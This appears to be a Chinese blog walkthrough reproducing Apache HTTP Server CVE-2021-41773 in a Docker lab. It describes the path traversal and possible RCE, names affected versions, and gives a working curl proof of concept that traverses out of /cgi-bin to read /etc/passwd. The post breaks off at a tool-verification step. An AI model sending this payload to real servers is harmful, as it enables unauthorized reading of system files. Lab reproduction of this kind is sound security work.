Apache CVE-2021-41773 漏洞攻略

2407-2 shw2024-09-23 12:59

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

漏洞复现

http://172.16.1.78:8080/

1.使⽤poc

curl http://172.16.1.78:8080/cgi-bin/../../../../etc/passwd

2.⼯具验证

相关推荐
lisanmengmeng5 小时前
apache-tomcat 安装部署
java·tomcat·apache
Hello.Reader9 小时前
Apache StreamPark 快速上手从一键安装到跑起第一个 Flink SQL 任务
sql·flink·apache
sanx1815 小时前
专业电竞体育数据与系统解决方案
前端·数据库·apache·数据库开发·时序数据库
光军oi19 小时前
全栈开发杂谈————关于websocket若干问题的大讨论
java·websocket·apache
二饭5 天前
POI操作Docx的踩坑指南(一)
java·apache
Faith_xzc6 天前
Apache Doris 内部数据裁剪与过滤机制的实现原理
apache
Trainer21076 天前
十分钟搭建thinkphp开发框架
php·apache·phpstorm·composer
syntaxseeker6 天前
Apache Beam入门教程:统一批流处理模型
其他·apache
Full Stack Developme6 天前
Java 工具类 Hutool、Guava 与 Apache Commons 的区别
java·apache·guava
忆~遂愿6 天前
谷歌云+Apache Airflow,数据处理自动化的强力武器
人工智能·python·深度学习·opencv·自动化·apache
热门推荐
01两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答02GitHub 镜像站点03UV安装并设置国内源04智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践0546个Nano-banana 精选提示词,持续更新中06GitLab 零基础入门指南:从安装到项目管理全流程07Linux下V2Ray安装配置指南08一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示09jdk21下载、安装(Windows、Linux、macOS)10Cursor Plan Mode:AI 终于知道先想后做了